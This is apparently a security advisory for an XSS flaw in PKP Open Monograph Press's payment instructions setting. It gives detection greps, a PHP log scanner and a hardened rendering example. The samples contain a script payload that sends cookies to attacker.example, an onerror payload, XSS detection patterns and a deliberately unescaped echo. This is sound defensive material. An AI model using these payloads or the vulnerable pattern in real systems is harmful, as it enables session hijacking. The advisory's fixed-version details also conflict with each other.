Platform
php
Component
pkp-lib
Fixed versions
3.3.1
3.4.1
3.5.1
A cross-site scripting (XSS) vulnerability has been identified in Public Knowledge Project Open Monograph Publisher (OMP) versions 3.3.0 through 3.5.0. This vulnerability affects the Payment Instructions Setting Handler component and allows an attacker to inject malicious scripts via manipulation of the manualInstructions argument. Successful exploitation could lead to session hijacking or defacement of the OMP website. The vulnerability is fixed in version 3.5.1.
The XSS vulnerability in OMP lets an attacker inject arbitrary JavaScript into a page viewed by other users. The injected script can steal session cookies or credentials entered on the page, redirect users to malicious sites, or deface the site. The impact is greater if the OMP instance handles sensitive data or payments, because an attacker who hijacks a session can act inside the victim's account. While the CVSS score is LOW, the potential for user data compromise and site manipulation warrants prompt attention.
This vulnerability was publicly disclosed on 2025-11-20. No public proof-of-concept (PoC) code had been released at the time of writing, but an XSS of this kind is simple to weaponize once the injection point is known, so it could become a target for automated attacks. The vulnerability is not currently listed in CISA KEV. The LOW CVSS score reflects the limited direct impact of a single injected script, but proactive mitigation is still recommended.
Organizations and individuals using Public Knowledge Project OMP to publish monographs and other scholarly works are at risk, including academic institutions, research organizations and publishers that rely on OMP for content management. Deployments that serve several presses or OMP instances from one hostname deserve extra attention: a script injected through one of them runs in the shared browser origin and can reach sessions that belong to the others.
• php: Examine plugins/paymethod/manual/templates/paymentForm.tpl for places where the manualInstructions value is written into the page without HTML encoding. In a Smarty template that means a `{$manualInstructions}` expression with no `|escape` modifier; any PHP path that echoes the value directly is the same defect.

```php
// Example of vulnerable code: the value reaches the page without HTML encoding
echo $_GET['manualInstructions'];
```

• generic web: Monitor logs for requests that carry a manualInstructions parameter whose value contains script markup, raw or URL-encoded (`<script`, `%3Cscript`, `onerror=`). A standard access log records only the request line, so a payload submitted in a POST body will not appear there; catching it requires a WAF or a request-body audit log. Use a WAF to block requests containing suspicious JavaScript.

```shell
# -i catches mixed case; the encoded forms cover payloads sent in the query string
grep -iE '<script|%3Cscript|%3C%2Fscript' /var/log/apache2/access.log
```
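The log check above only works if the payload is decoded before matching, since `%3Cscript%3E`, `&lt;script&gt;` and double-encoded variants all defeat a plain grep. The script below is an added example, not part of this advisory and not PKP code: it scans access-log lines for a manualInstructions parameter, normalizes the value, and flags script-like content. The log lines and the `/index.php/press/manage/settings` path are constructed for the example; real OMP request paths differ.

```php
<?php
// Added example (not from this advisory and not PKP code): scan access-log lines
// for a manualInstructions parameter whose value contains script markup.
// Values are URL-decoded repeatedly and HTML-entity-decoded before matching so
// that %3Cscript%3E, &lt;script&gt; and double-encoded variants are caught.
// The log lines and the /index.php/press/manage/settings path are constructed
// for this example; real OMP request paths differ.

/** Undo repeated URL encoding (bounded) and HTML entities so the matcher sees plain markup. */
function decodeParam(string $value): string
{
    $prev = null;
    for ($i = 0; $i < 5 && $prev !== $value; $i++) {
        $prev = $value;
        $value = urldecode($value);
    }
    return html_entity_decode($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/** True if a decoded value carries markup typical of an XSS payload. */
function looksLikeXss(string $decoded): bool
{
    $pattern = '/<\s*script|<\s*\/?\s*(img|svg|iframe|object|embed)\b|\bon[a-z]+\s*=|javascript\s*:/i';
    return (bool) preg_match($pattern, $decoded);
}

/**
 * Scan combined-format log lines. Returns [1-based line number => decoded payload]
 * for every request whose query string has a suspicious manualInstructions value.
 * Only the request line is available here: a payload sent in a POST body never
 * reaches the access log, which is why the POST line in the sample is not flagged.
 */
function scanAccessLog(string $log): array
{
    $hits = [];
    foreach (explode("\n", trim($log)) as $idx => $line) {
        if (!preg_match('/"(?:GET|POST|PUT|PATCH) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
            continue;
        }
        $query = parse_url($m[1], PHP_URL_QUERY);
        if (!is_string($query)) {
            continue; // no query string (typically a POST); nothing to inspect in this log
        }
        parse_str($query, $params);
        if (!isset($params['manualInstructions']) || !is_string($params['manualInstructions'])) {
            continue;
        }
        $decoded = decodeParam($params['manualInstructions']);
        if (looksLikeXss($decoded)) {
            $hits[$idx + 1] = $decoded;
        }
    }
    return $hits;
}

// Constructed sample: one benign value, two encoded payloads, one POST with no query string.
$sampleLog = <<<'LOG'
203.0.113.5 - - [20/Nov/2025:10:01:02 +0000] "GET /index.php/press/manage/settings?manualInstructions=Pay+by+bank+transfer HTTP/1.1" 200 512
203.0.113.9 - - [20/Nov/2025:10:02:17 +0000] "GET /index.php/press/manage/settings?manualInstructions=%3Cscript%3Efetch('https://attacker.example/?c='%2Bdocument.cookie)%3C/script%3E HTTP/1.1" 200 512
198.51.100.7 - - [20/Nov/2025:10:03:44 +0000] "GET /index.php/press/manage/settings?manualInstructions=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 512
198.51.100.8 - - [20/Nov/2025:10:04:10 +0000] "POST /index.php/press/manage/settings HTTP/1.1" 302 0
LOG;

// Lines 2 and 3 are reported; line 1 is benign and line 4 carries its data in a body the log never saw.
foreach (scanAccessLog($sampleLog) as $lineNo => $payload) {
    printf("line %d: suspicious manualInstructions value: %s\n", $lineNo, $payload);
}
```

The decode loop is bounded so a value built from thousands of nested `%25` prefixes cannot stall the scanner, and the matcher runs on the decoded form only. The unflagged POST line is the practical limit of this approach: for settings saved through a form, the value travels in the request body, so pair this check with WAF or audit logging that records bodies.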
Exploitation status
EPSS
0.06% (19th percentile)
CISA SSVC
CVSS vector
The primary mitigation for CVE-2025-13469 is to upgrade to OMP version 3.5.1 or later, which contains the fix. If upgrading is not immediately feasible, consider implementing input validation and sanitization on the manualInstructions parameter to prevent malicious code from being injected. Web Application Firewalls (WAFs) configured to detect and block XSS attacks can also provide an additional layer of protection. Review and update any custom plugins or themes to ensure they do not introduce similar vulnerabilities.
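The interim measure described above is output encoding of the stored value, with input validation as a second layer. The snippet below is an added example, not code from this advisory or from PKP: it places the unsafe rendering pattern next to a hardened one. The setting name manualInstructions comes from the advisory; the payload, function names and surrounding markup are constructed for the example.

```php
<?php
// Added example (not PKP code): the unsafe way of emitting a stored
// manualInstructions setting next to a hardened version. The setting name comes
// from the advisory; the payload, function names and markup are constructed here.

/** Constructed payload that someone with access to the payment settings form might store. */
const ATTACKER_PAYLOAD = "Pay by bank transfer.\n<script>fetch('https://attacker.example/?c=' + document.cookie)</script>";

/** Vulnerable: the stored value is written into the page verbatim, so stored markup executes for every visitor. */
function renderInstructionsUnsafe(string $stored): string
{
    return '<div class="instructions">' . $stored . '</div>';
}

/** Hardened: encode for an HTML text context first, then add <br> tags to the already-encoded text. */
function renderInstructionsSafe(string $stored): string
{
    $encoded = htmlspecialchars($stored, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="instructions">' . nl2br($encoded) . '</div>';
}

/**
 * Interim save-time check for installs that only ever want plain-text instructions:
 * reject anything that looks like a tag, an event-handler attribute or a javascript: URL.
 * This is defence in depth; the output encoding above is what actually prevents XSS.
 */
function validateInstructionsInput(string $raw): bool
{
    return preg_match('/<\s*[a-z!\/]|\bon[a-z]+\s*=|javascript\s*:/i', $raw) === 0;
}

/** Helper for the demo: does rendered HTML still contain an executable script tag? */
function containsScriptTag(string $html): bool
{
    return preg_match('/<\s*script\b/i', $html) === 1;
}

printf("input accepted by validator:  %s\n", validateInstructionsInput(ATTACKER_PAYLOAD) ? 'yes' : 'no');
printf("unsafe render executes script: %s\n", containsScriptTag(renderInstructionsUnsafe(ATTACKER_PAYLOAD)) ? 'yes' : 'no');
printf("safe render executes script:   %s\n", containsScriptTag(renderInstructionsSafe(ATTACKER_PAYLOAD)) ? 'yes' : 'no');
echo renderInstructionsSafe(ATTACKER_PAYLOAD), "\n";
```

Two points matter in the hardened version: `htmlspecialchars` runs before `nl2br`, so the only tags in the output are the ones the code itself adds, and `ENT_QUOTES` is set so the same helper stays safe if the value is ever placed inside an attribute. `strip_tags` with an allowlist is not a substitute, because it leaves event-handler attributes such as `onerror=` on the tags it keeps; if the instructions genuinely need rich text, use a real HTML sanitizer with an allowlist of both tags and attributes.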
Update Public Knowledge Project omp/ojs to a version later than 3.5.0. This fixes the cross-site scripting vulnerability in the Payment Instructions Setting Handler component. Consult the release notes for more details on the update.
CVE-2025-13469 is a cross-site scripting (XSS) vulnerability affecting Public Knowledge Project OMP versions 3.3.0 through 3.5.0, allowing attackers to inject malicious scripts.
You are affected if you run any Public Knowledge Project OMP version from 3.3.0 through 3.5.0. Upgrade to 3.5.1 or later to resolve the issue.
Upgrade to Public Knowledge Project OMP version 3.5.1 or later. Consider input validation and WAF rules as interim measures.
While no active exploitation has been confirmed, the ease of exploitation suggests it could become a target. Proactive mitigation is recommended.
Refer to the Public Knowledge Project security advisories page for the latest information: [https://security.pkp.org/](https://security.pkp.org/)